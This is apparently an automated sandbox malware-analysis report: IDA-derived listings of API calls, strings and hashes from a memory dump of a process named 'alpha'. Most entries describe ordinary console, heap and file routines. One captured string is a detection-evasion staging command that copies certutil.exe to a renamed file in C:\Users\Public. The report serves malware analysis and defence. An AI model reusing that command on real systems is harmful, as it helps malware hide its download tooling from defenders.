                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC80EA
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC8177
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC819A
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC81BD
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC81DC
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC81FB
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC821A
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC8239
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8291
                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC82D7
                                      • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC82FB
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC831A
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8364
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC8378
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC839A
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC83AE
                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC83E6
                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8403
                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8418
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                      • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                      • API String ID: 3637805771-3100821235
                                      • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                      • Instruction ID: 2d25489c8d181c2dc94be42cd86b9f12feab3f75d1d1712156a6a443c460aaba
                                      • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                      • Instruction Fuzzy Hash: 14E194BBA046938AE750EB51E40417AFBA1FB49F99BC89235CD1E93790DF3CA445C720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                      • String ID: %s$%s
                                      • API String ID: 3623545644-3518022669
                                      • Opcode ID: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                      • Instruction ID: bddf133d20673893853bf211d4f59680652121291cfa981a932bb4bc0643ee1e
                                      • Opcode Fuzzy Hash: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                      • Instruction Fuzzy Hash: 98D2C7BBA0868386EB64AB61D4402BDB7A1FB45F5CF981139DA5E47B94DF3CE800C710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                      • String ID: %9d$%s
                                      • API String ID: 4286035211-3662383364
                                      • Opcode ID: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                      • Instruction ID: 27647bcc11e8c6c65592952dbd61f6f7e3992370d3d4d2e9d5bcd47fa42ce5f6
                                      • Opcode Fuzzy Hash: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                      • Instruction Fuzzy Hash: F052B57BA08A838AEB60AB20D8502FDB7A0FB85F5CF885135DA1E47B94DF3CD5458710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcsrchr$towlower
                                      • String ID: fdpnxsatz
                                      • API String ID: 3267374428-1106894203
                                      • Opcode ID: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                      • Instruction ID: eee173852fae0986c60b038432868019c36839b361671b3f012eba357d500b7f
                                      • Opcode Fuzzy Hash: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                      • Instruction Fuzzy Hash: 6F42BFBBB09A8385EB64AF2595042B9A7A1FF45FA8FD84135DE0E47784DF3CE8418310
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                      • String ID: DPATH
                                      • API String ID: 95024817-2010427443
                                      • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                      • Instruction ID: 17ec2e23ce6083fa4e86844201c20c1a3b0f398a8662be62575ee5a4599a0a5b
                                      • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                      • Instruction Fuzzy Hash: 8212C8BBA0868386E764AF11A440179FBA1FF89F59F889179EA5E47794DF3CD400CB10
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: [...]$ [..]$ [.]$...$:
                                      • API String ID: 0-1980097535
                                      • Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                      • Instruction ID: 7b12a3413928356230ae093d7135840b01057ac0d49657d8ea6cde634e711ecc
                                      • Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                      • Instruction Fuzzy Hash: 9532BFBBA0878386EB60EB60E8402F9B7A0EB45F8CF885135DA5D47695DF3CE545C720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                      • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                      • API String ID: 1795611712-3662956551
                                      • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                      • Instruction ID: 458b22ada00aa02fd7f885a4b2b95b088bc0633d77c8d99afef250876525c204
                                      • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                      • Instruction Fuzzy Hash: D3E1A2ABE0864386E750AB64E8401BDEAA1FF44F8DFDC5531DA0E47695EE3CE544C320
                                      APIs
                                      • _wcsupr.MSVCRT ref: 00007FF755CCEF33
                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCEF98
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCEFA9
                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCEFBF
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF755CCEFDC
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCEFED
                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF003
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF022
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF083
                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF092
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF0A5
                                      • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF755CCF0DB
                                      • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF135
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF16C
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF185
                                        • Part of subcall function 00007FF755CB01B8: _get_osfhandle.MSVCRT ref: 00007FF755CB01C4
                                        • Part of subcall function 00007FF755CB01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB01D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                      • String ID: <noalias>$CMD.EXE
                                      • API String ID: 1161012917-1690691951
                                      • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                      • Instruction ID: 7f85f301128a83fe36914602a667398bcf9620d9622955d0ff0358fb50793b3b
                                      • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                      • Instruction Fuzzy Hash: 5F91A3ABB0868386FB55BB60D8001BDAAA0AF4AF5DFCC5135DD1E426D5DF3CA445C320
                                      APIs
                                        • Part of subcall function 00007FF755CB3578: _get_osfhandle.MSVCRT ref: 00007FF755CB3584
                                        • Part of subcall function 00007FF755CB3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB359C
                                        • Part of subcall function 00007FF755CB3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35C3
                                        • Part of subcall function 00007FF755CB3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35D9
                                        • Part of subcall function 00007FF755CB3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35ED
                                        • Part of subcall function 00007FF755CB3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB3602
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CA32F3
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF755CA32A4), ref: 00007FF755CA3309
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF755CA3384
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CC11DF
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                      • String ID:
                                      • API String ID: 611521582-0
                                      • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                      • Instruction ID: 2c281a3b56d7b0a81a2ee9769d386d17df84a74188b3925059ab50db176404af
                                      • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                      • Instruction Fuzzy Hash: AEA1A3BBF0865386EB14AB65E8142BDEBA1FF49F5DF885135CD0E86B44DF3C94458220
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                      • String ID: \\?\
                                      • API String ID: 628682198-4282027825
                                      • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                      • Instruction ID: 52c781ff4e8b4d944cfa872095afbb69f472723333ac3e4be64ec6d73b5e1e1d
                                      • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                      • Instruction Fuzzy Hash: A1E1AFBBA0868396EB61AB20D8502F9A7A0FB44F5DFC85135DA4E867D4EF3CE545C310
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                      • String ID:
                                      • API String ID: 16309207-0
                                      • Opcode ID: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                      • Instruction ID: 82301ffef7fd4107521d267c1c5c8e3753e5127c6dbeeb810274a5398f624165
                                      • Opcode Fuzzy Hash: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                      • Instruction Fuzzy Hash: DD22B0BBB04B8386EB64AF60D8542B9A3A0FF45B8CF885135DA1E47B95DF3CE5458310
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                      • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                      • API String ID: 3863671652-4137775220
                                      • Opcode ID: 3640a331ccc2cc57322506a3803c6ed823bdadfa8ecf7f5cc83c189721e7befd
                                      • Instruction ID: 78ad319447d94514cd48535676afd331a9b85d58ed1a9bce6f424c472d0d0ee4
                                      • Opcode Fuzzy Hash: 3640a331ccc2cc57322506a3803c6ed823bdadfa8ecf7f5cc83c189721e7befd
                                      • Instruction Fuzzy Hash: 0CE1ADAFE0968386FA61BB14D4543B9ABA0AF45F58FCC4935DA1E462D1DF3CE841C720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                      • String ID: $Application$System
                                      • API String ID: 3538039442-1881496484
                                      • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                      • Instruction ID: f8def9474cb8d7764a770c5559190ff5544d31217f48bfd86ca278c70707937f
                                      • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                      • Instruction Fuzzy Hash: 7951AFBBA08B8286E760AB15F41067AFAA1FB89F48F899134DE5E43B50DF3CD445C710
                                      APIs
                                      • longjmp.MSVCRT(?,?,00000000,00007FF755CC048E), ref: 00007FF755CCDA58
                                      • memset.MSVCRT ref: 00007FF755CCDAD6
                                      • memset.MSVCRT ref: 00007FF755CCDAFC
                                      • memset.MSVCRT ref: 00007FF755CCDB22
                                        • Part of subcall function 00007FF755CB3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF755CCEAC5,?,?,?,00007FF755CCE925,?,?,?,?,00007FF755CAB9B1), ref: 00007FF755CB3A56
                                        • Part of subcall function 00007FF755CA5194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF755CA51C4
                                        • Part of subcall function 00007FF755CB823C: FindFirstFileExW.KERNELBASE ref: 00007FF755CB8280
                                        • Part of subcall function 00007FF755CB823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CB829D
                                        • Part of subcall function 00007FF755CB01B8: _get_osfhandle.MSVCRT ref: 00007FF755CB01C4
                                        • Part of subcall function 00007FF755CB01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB01D6
                                        • Part of subcall function 00007FF755CA4FE8: _get_osfhandle.MSVCRT ref: 00007FF755CA5012
